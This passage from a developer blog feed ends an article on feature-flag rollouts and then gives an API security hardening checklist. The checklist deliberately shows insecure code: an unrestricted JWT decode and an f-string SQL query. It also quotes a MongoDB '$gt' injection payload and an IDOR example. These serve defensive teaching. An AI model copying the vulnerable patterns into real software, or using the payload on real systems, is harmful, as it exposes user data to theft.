&lt;p&gt;&lt;strong&gt;Flag lifecycle&lt;/strong&gt;: Every flag has a lifecycle: created → active → rolled out → archived. Flags that have been at 100% for more than 30 days get cleaned up. Stale flags are technical debt.&lt;/p&gt;
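&lt;p&gt;Under the hood, user-level percentage targeting is usually a stable hash bucket. A toy sketch of the mechanism — a stand-in for what Unleash, LaunchDarkly, or Flipt do internally, not their actual APIs:&lt;/p&gt;

```python
# Sticky percentage rollout: hashing the flag name plus user ID gives
# each user a stable 0-99 bucket, so the same user stays in or out of
# the rollout consistently as the percentage grows.
import hashlib

def is_enabled(flag_name, user_id, rollout_percent):
    digest = hashlib.sha256(f"{flag_name}:{user_id}".encode()).hexdigest()
    bucket = int(digest, 16) % 100
    return rollout_percent > bucket
```

&lt;p&gt;Because the bucket depends only on the flag name and user ID, a user gets a consistent answer across requests, and raising the percentage from 1 to 10 to 50 only ever adds users to the rollout.&lt;/p&gt;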

&lt;h2&gt;
  
  
  The 7-Step Progressive Delivery Playbook
&lt;/h2&gt;

&lt;p&gt;This is the exact process we follow for every feature:&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 1: Internal Dogfooding (Day 1)
&lt;/h3&gt;

&lt;p&gt;Enable the flag for your internal team only. Use it in your daily work. Catch the obvious bugs, UX issues, and performance problems before any user sees them.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 2: Canary Release (Day 2-3)
&lt;/h3&gt;

&lt;p&gt;Roll out to 1% of real users. Monitor error rates, latency, and business metrics (conversion rate, revenue, engagement) for this cohort versus the control group. If any metric degrades by more than 5%, kill the flag.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 3: Early Adopter Ring (Day 4-5)
&lt;/h3&gt;

&lt;p&gt;Expand to 10% of users. At this scale, you'll catch issues that only appear under moderate load — race conditions, cache invalidation bugs, third-party API rate limits.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 4: Regional Rollout (Day 6-7)
&lt;/h3&gt;

&lt;p&gt;If your product serves multiple regions, roll out one region at a time. Start with your lowest-traffic region. This catches timezone-dependent bugs and region-specific integration issues.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 5: 50% Split (Day 8-10)
&lt;/h3&gt;

&lt;p&gt;Half your users are on the new code. At this point, you have statistically significant data on whether the new feature improves or hurts your metrics. This is where you make the go/no-go decision.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 6: Full Rollout (Day 11-14)
&lt;/h3&gt;

&lt;p&gt;Flip to 100%. Keep the flag in place for at least one more week as a kill switch.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 7: Flag Cleanup (Day 21+)
&lt;/h3&gt;

&lt;p&gt;Remove the flag from code. Delete the if/else. Merge the feature permanently. This step is critical — every active flag adds cognitive complexity to your codebase.&lt;/p&gt;

&lt;h2&gt;
  
  
  Kill Switches: The Instant Rollback
&lt;/h2&gt;

&lt;p&gt;The most valuable feature of flags isn't progressive rollout — it's instant rollback. When something goes wrong at 2am, you don't need to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Revert a commit&lt;/li&gt;
&lt;li&gt;Wait for CI/CD to rebuild&lt;/li&gt;
&lt;li&gt;Deploy the previous version&lt;/li&gt;
&lt;li&gt;Hope the database migrations are backward-compatible&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You flip a toggle. The feature is off. Users see the old behavior. Total time: under 60 seconds. No deployment required.&lt;/p&gt;

&lt;p&gt;We've used kill switches 23 times in the last year. Every single time, we were back to stable within a minute. Compare that to a traditional rollback that takes 15-30 minutes if everything goes smoothly.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to Flag (And What Not To)
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Flag these:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;New user-facing features&lt;/li&gt;
&lt;li&gt;Major refactors of critical paths&lt;/li&gt;
&lt;li&gt;Third-party integration changes&lt;/li&gt;
&lt;li&gt;Performance optimizations that change behavior&lt;/li&gt;
&lt;li&gt;Database query changes on high-traffic endpoints&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Don't flag these:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Bug fixes (just fix them)&lt;/li&gt;
&lt;li&gt;Copy changes and translations&lt;/li&gt;
&lt;li&gt;Dependency updates&lt;/li&gt;
&lt;li&gt;Internal tooling changes&lt;/li&gt;
&lt;li&gt;Logging and monitoring additions&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Over-flagging creates its own problems. If every change has a flag, you end up with hundreds of active flags, complex interaction effects between flags, and engineers who spend more time managing flags than writing features.&lt;/p&gt;

&lt;h2&gt;
  
  
  Metrics That Matter
&lt;/h2&gt;

&lt;p&gt;For each flagged feature, we track:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;What It Tells You&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Error rate (flagged vs control)&lt;/td&gt;
&lt;td&gt;Is the new code broken?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;p99 latency (flagged vs control)&lt;/td&gt;
&lt;td&gt;Is the new code slow?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Conversion rate&lt;/td&gt;
&lt;td&gt;Does the feature help the business?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Flag evaluation latency&lt;/td&gt;
&lt;td&gt;Is the flag system itself adding overhead?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Active flag count&lt;/td&gt;
&lt;td&gt;Are we accumulating technical debt?&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Set up automated alerts for metric degradation. If the flagged cohort's error rate exceeds the control by more than 2x, automatically disable the flag and page the on-call.&lt;/p&gt;
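&lt;p&gt;The auto-disable rule can be expressed in a few lines. A sketch (the threshold and names are illustrative; the per-cohort rates would come from your metrics system, e.g. Prometheus queries):&lt;/p&gt;

```python
DEGRADATION_FACTOR = 2.0  # flagged cohort may not exceed 2x the control

def should_kill(flagged_error_rate, control_error_rate, min_control=0.001):
    """Decide whether to auto-disable a flag, given error rates for the
    flagged and control cohorts. min_control guards against dividing by
    a near-zero baseline on quiet endpoints."""
    baseline = max(control_error_rate, min_control)
    return flagged_error_rate / baseline > DEGRADATION_FACTOR
```

&lt;p&gt;Wire the True branch to your flag platform's disable call and your paging system.&lt;/p&gt;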

&lt;h2&gt;
  
  
  The Hidden Benefit: Decoupled Teams
&lt;/h2&gt;

&lt;p&gt;Feature flags solve a coordination problem that has nothing to do with code quality. Without flags, teams that share a codebase need to coordinate their releases. "Don't deploy on Thursday — Team B is releasing the new payment flow."&lt;/p&gt;

&lt;p&gt;With flags, every team deploys whenever they want. Their features are invisible until they're ready. No coordination meetings. No deploy freezes. No waiting for another team to finish their PR review before you can ship.&lt;/p&gt;

&lt;p&gt;This alone — the reduction in cross-team coordination overhead — has saved our clients more engineering hours than any other practice we've introduced.&lt;/p&gt;

&lt;h2&gt;
  
  
  Getting Started: The Pragmatic Approach
&lt;/h2&gt;

&lt;p&gt;You don't need a feature flag platform on day one. Start here:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Week 1&lt;/strong&gt;: Create an environment variable-based flag for your next feature. &lt;code&gt;ENABLE_NEW_CHECKOUT=true&lt;/code&gt;. Deploy it disabled.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Week 2&lt;/strong&gt;: Add user-level targeting. A simple database table: &lt;code&gt;(flag_name, user_id, enabled)&lt;/code&gt;. Query it on each request.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Week 3&lt;/strong&gt;: Add percentage-based rollout. Hash the user ID, compare against the percentage threshold.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Month 2&lt;/strong&gt;: If you're managing more than 10 flags, adopt a proper flag platform — Unleash (open source), Flipt, or LaunchDarkly.&lt;/li&gt;
&lt;/ol&gt;
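&lt;p&gt;Week 3's percentage-based rollout fits in a few lines. A sketch (function and flag names are illustrative):&lt;/p&gt;

```python
import hashlib

def in_rollout(flag_name, user_id, percentage):
    """Deterministic bucketing: hashing flag_name with user_id means the
    same user always lands in the same bucket, so raising the percentage
    only adds users to the cohort; it never flips existing users out."""
    key = ("%s:%s" % (flag_name, user_id)).encode()
    bucket = int(hashlib.sha256(key).hexdigest(), 16) % 100
    return bucket < percentage
```

&lt;p&gt;Including the flag name in the hash key keeps cohorts independent across flags, so the same 10% of users aren't always the guinea pigs.&lt;/p&gt;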

&lt;p&gt;The first time you use a kill switch to instantly disable a broken feature at 2am instead of scrambling through a 30-minute rollback, you'll never deploy without flags again.&lt;/p&gt;

&lt;h2&gt;
  
  
  Common Pitfalls That Kill Feature Flag Adoption
&lt;/h2&gt;

&lt;p&gt;We've helped dozens of teams adopt feature flags, and the failure modes are remarkably consistent:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Flag explosion.&lt;/strong&gt; Teams get excited and flag everything. Within six months they have 200 active flags, nobody knows which ones are safe to remove, and the codebase becomes a maze of conditional logic. Set a hard rule: every flag has a 30-day review date. If it's at 100% for more than 30 days, it gets removed from code. No exceptions.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. No flag ownership.&lt;/strong&gt; When a flag has no owner, it never gets cleaned up. Every flag should have a named owner in your flag platform. When that person leaves the team, ownership transfers explicitly — never implicitly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Flag interaction bugs.&lt;/strong&gt; When you have 20 active flags, you have potentially 2^20 combinations of states. You can't test all of them. The solution: keep the number of active flags small (under 15), and never have two flags that modify the same code path.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Using flags as permanent configuration.&lt;/strong&gt; Feature flags are for temporary progressive rollout, not permanent A/B tests or configuration management. If a flag is meant to stay forever, it's not a feature flag — it's a config value. Move it to your configuration system.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. Skipping the kill switch test.&lt;/strong&gt; Your kill switch is only useful if it works. Test it. Once a month, disable a non-critical feature in production via its kill switch, verify the old behavior works, then re-enable. If you've never tested your rollback path, you don't have a rollback path.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;&lt;a href="https://www.techsaas.cloud/services/" rel="noopener noreferrer"&gt;TechSaaS&lt;/a&gt; helps engineering teams implement progressive delivery pipelines that make deployments boring. If your releases still feel like holding your breath and hoping, we should talk.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>devops</category>
      <category>cloud</category>
      <category>infrastructure</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>API Security Hardening Checklist: 15 Points Every API Must Pass</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Tue, 21 Apr 2026 06:00:04 +0000</pubDate>
      <link>https://forem.com/yash_pritwani_07a77613fd6/api-security-hardening-checklist-15-points-every-api-must-pass-43p2</link>
      <guid>https://forem.com/yash_pritwani_07a77613fd6/api-security-hardening-checklist-15-points-every-api-must-pass-43p2</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/api-security-hardening-checklist-production" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;








&lt;h1&gt;
  
  
  API Security Hardening Checklist for Production: 15 Points Every API Must Pass
&lt;/h1&gt;

&lt;p&gt;We audited over 40 production APIs last year. Every single one failed at least 3 items on this checklist. The median was 5 failures. Two of them had critical vulnerabilities that could have led to full database exposure.&lt;/p&gt;

&lt;p&gt;The uncomfortable truth? Most API security failures aren't sophisticated attacks. They're basic hygiene items that teams skip because they're "boring" or "we'll get to it later." Later never comes until after the breach.&lt;/p&gt;

&lt;p&gt;This checklist is ordered by severity. If you can only fix five things today, fix the first five.&lt;/p&gt;

&lt;h2&gt;
  
  
  Authentication &amp;amp; Authorization
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. JWT Validation Is Complete
&lt;/h3&gt;

&lt;p&gt;Don't just check if the token is present. Validate:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Signature&lt;/strong&gt; using the correct algorithm (RS256, not HS256 with a guessable secret)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Expiration&lt;/strong&gt; (&lt;code&gt;exp&lt;/code&gt; claim) — tokens should expire in minutes, not days&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Issuer&lt;/strong&gt; (&lt;code&gt;iss&lt;/code&gt; claim) — reject tokens from unknown issuers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audience&lt;/strong&gt; (&lt;code&gt;aud&lt;/code&gt; claim) — reject tokens meant for other services&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The most common failure: accepting tokens signed with &lt;code&gt;alg: none&lt;/code&gt;. Your JWT library should reject this by default, but verify it does.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# BAD — accepts any algorithm
&lt;/span&gt;&lt;span class="n"&gt;decoded&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;jwt&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;secret&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# GOOD — explicitly specify allowed algorithms
&lt;/span&gt;&lt;span class="n"&gt;decoded&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;jwt&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;public_key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;algorithms&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;RS256&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2. Authorization Checks on Every Endpoint
&lt;/h3&gt;

&lt;p&gt;Authentication tells you who they are. Authorization tells you what they can do. We've seen APIs where users could access any resource by changing the ID in the URL:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;GET /api/users/123/invoices  → returns YOUR invoices
GET /api/users/456/invoices  → returns SOMEONE ELSE'S invoices
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is Insecure Direct Object Reference (IDOR), the top risk in the OWASP API Security Top 10 (listed there as Broken Object Level Authorization). Every endpoint must verify that the authenticated user has permission to access the requested resource.&lt;/p&gt;
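&lt;p&gt;The fix is an ownership check on every lookup. A sketch (the in-memory table and exception class are illustrative stand-ins for your ORM and your framework's error response):&lt;/p&gt;

```python
class Forbidden(Exception):
    """Stand-in for your framework's 403/404 response."""

INVOICES = {  # stand-in for a database table
    1: {"id": 1, "owner_id": 123, "total": 50},
    2: {"id": 2, "owner_id": 456, "total": 75},
}

def get_invoice(authenticated_user_id, invoice_id):
    invoice = INVOICES.get(invoice_id)
    # Never trust the ID in the URL alone: verify the resource belongs
    # to the caller before returning it.
    if invoice is None or invoice["owner_id"] != authenticated_user_id:
        raise Forbidden("not found")  # same error for missing and not-yours
    return invoice
```

&lt;p&gt;Returning the same error for "missing" and "not yours" also avoids leaking which IDs exist.&lt;/p&gt;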

&lt;h3&gt;
  
  
  3. API Key Rotation and Scoping
&lt;/h3&gt;

&lt;p&gt;If you use API keys: they must be scoped (read-only vs read-write), they must rotate automatically (90 days max), and revoked keys must be rejected immediately — not after a cache TTL expires.&lt;/p&gt;

&lt;h2&gt;
  
  
  Input Validation
&lt;/h2&gt;

&lt;h3&gt;
  
  
  4. Request Size Limits
&lt;/h3&gt;

&lt;p&gt;Without size limits, an attacker can send a 10GB JSON body and crash your server. Set explicit limits:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight nginx"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Nginx&lt;/span&gt;
&lt;span class="k"&gt;client_max_body_size&lt;/span&gt; &lt;span class="mi"&gt;1m&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;# Express.js&lt;/span&gt;
&lt;span class="k"&gt;app.use&lt;/span&gt;&lt;span class="s"&gt;(express.json(&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="kn"&gt;limit:&lt;/span&gt; &lt;span class="s"&gt;'1mb'&lt;/span&gt; &lt;span class="err"&gt;}&lt;/span&gt;&lt;span class="s"&gt;))&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Also limit: array lengths, string lengths, nested object depth, and number of request parameters.&lt;/p&gt;
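&lt;p&gt;Those structural limits can be enforced with one recursive check over the parsed payload. A sketch (limit values are illustrative; tune them to your real traffic):&lt;/p&gt;

```python
def check_limits(value, max_depth=10, max_items=1000, max_str=10000, depth=0):
    """Recursively enforce structural limits on a parsed JSON payload:
    nesting depth, list/object size, and string length."""
    if depth > max_depth:
        return False
    if isinstance(value, str):
        return len(value) <= max_str
    if isinstance(value, list):
        return len(value) <= max_items and all(
            check_limits(v, max_depth, max_items, max_str, depth + 1)
            for v in value)
    if isinstance(value, dict):
        return len(value) <= max_items and all(
            check_limits(v, max_depth, max_items, max_str, depth + 1)
            for v in value.values())
    return True  # numbers, booleans, null
```
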

&lt;h3&gt;
  
  
  5. Schema Validation on Every Input
&lt;/h3&gt;

&lt;p&gt;Every request body, query parameter, and path parameter should be validated against a schema before reaching your business logic. Use OpenAPI schemas or JSON Schema validators.&lt;/p&gt;

&lt;p&gt;Don't just check types — check patterns, ranges, and allowed values:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"email"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"string"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"format"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"email"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"maxLength"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;254&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"age"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"integer"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"minimum"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"maximum"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;150&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"role"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"string"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"enum"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"user"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"admin"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  6. SQL Injection and NoSQL Injection Prevention
&lt;/h3&gt;

&lt;p&gt;Use parameterized queries. Always. No exceptions.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# BAD — SQL injection
&lt;/span&gt;&lt;span class="n"&gt;cursor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SELECT * FROM users WHERE id = &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# GOOD — parameterized
&lt;/span&gt;&lt;span class="n"&gt;cursor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SELECT * FROM users WHERE id = %s&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;,))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For MongoDB, watch out for query operator injection: &lt;code&gt;{"username": {"$gt": ""}}&lt;/code&gt; matches everything. Validate that input fields are strings, not objects.&lt;/p&gt;
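&lt;p&gt;A tiny guard catches the operator-injection case. A sketch (the helper name is illustrative; the schema validation from item 5 gives you this for free):&lt;/p&gt;

```python
def require_string(payload, field):
    """Reject operator objects like {"$gt": ""} in fields that must be
    plain strings before they reach a MongoDB query."""
    value = payload.get(field)
    if not isinstance(value, str):
        raise ValueError("%s must be a string" % field)
    return value
```
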

&lt;h2&gt;
  
  
  Rate Limiting &amp;amp; Abuse Prevention
&lt;/h2&gt;

&lt;h3&gt;
  
  
  7. Rate Limiting by Identity, Not Just IP
&lt;/h3&gt;

&lt;p&gt;IP-based rate limiting fails against distributed attacks and punishes legitimate users behind NAT/VPN. Rate limit by:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;API key or user ID (primary)&lt;/li&gt;
&lt;li&gt;IP address (secondary)&lt;/li&gt;
&lt;li&gt;Combination with sliding window counters&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Return a proper &lt;code&gt;429 Too Many Requests&lt;/code&gt; response with a &lt;code&gt;Retry-After&lt;/code&gt; header so well-behaved clients know when to back off.&lt;/p&gt;
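&lt;p&gt;A sliding-window limiter keyed by identity is short enough to sketch here (class and method names are illustrative; in production the per-identity state would live in Redis, e.g. sorted sets, so all app servers share it):&lt;/p&gt;

```python
import time
from collections import defaultdict, deque

class SlidingWindowLimiter:
    """Per-identity sliding-window rate limiter (in-process sketch)."""

    def __init__(self, limit, window_seconds):
        self.limit = limit
        self.window = window_seconds
        self.hits = defaultdict(deque)  # identity to timestamps of recent hits

    def allow(self, identity, now=None):
        now = time.monotonic() if now is None else now
        q = self.hits[identity]
        while q and now - q[0] >= self.window:  # drop hits outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False  # caller responds 429 with Retry-After
        q.append(now)
        return True
```

&lt;p&gt;Key the limiter on API key or user ID first, with a second coarser limiter on IP as a backstop.&lt;/p&gt;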

&lt;h3&gt;
  
  
  8. Endpoint-Specific Limits
&lt;/h3&gt;

&lt;p&gt;Your login endpoint should have much stricter limits than your product listing endpoint. Set per-endpoint limits:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Endpoint&lt;/th&gt;
&lt;th&gt;Limit&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;POST /auth/login&lt;/td&gt;
&lt;td&gt;5/minute&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;POST /auth/register&lt;/td&gt;
&lt;td&gt;3/minute&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GET /api/products&lt;/td&gt;
&lt;td&gt;100/minute&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;POST /api/orders&lt;/td&gt;
&lt;td&gt;20/minute&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  9. Request Throttling for Expensive Operations
&lt;/h3&gt;

&lt;p&gt;Search, report generation, export, and analytics endpoints should have dedicated throttling. A single user running 50 concurrent export requests can bring down your database.&lt;/p&gt;

&lt;h2&gt;
  
  
  Response Security
&lt;/h2&gt;

&lt;h3&gt;
  
  
  10. Never Expose Stack Traces
&lt;/h3&gt;

&lt;p&gt;A 500 response with a full Python traceback tells an attacker your framework, database, file paths, and sometimes credentials. In production, return generic error messages:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"error"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"internal_server_error"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"message"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"An unexpected error occurred"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"request_id"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"req_abc123"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Log the full trace server-side with the request ID for debugging.&lt;/p&gt;
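&lt;p&gt;A sketch of that error handler (framework wiring omitted; the response body matches the example above, and the logger/ID format is illustrative):&lt;/p&gt;

```python
import logging
import traceback
import uuid

logger = logging.getLogger("api")

def handle_exception(exc):
    """Return a generic body to the client; keep the real traceback in
    server-side logs, joined to the response by a request ID."""
    request_id = "req_" + uuid.uuid4().hex[:12]
    trace = "".join(
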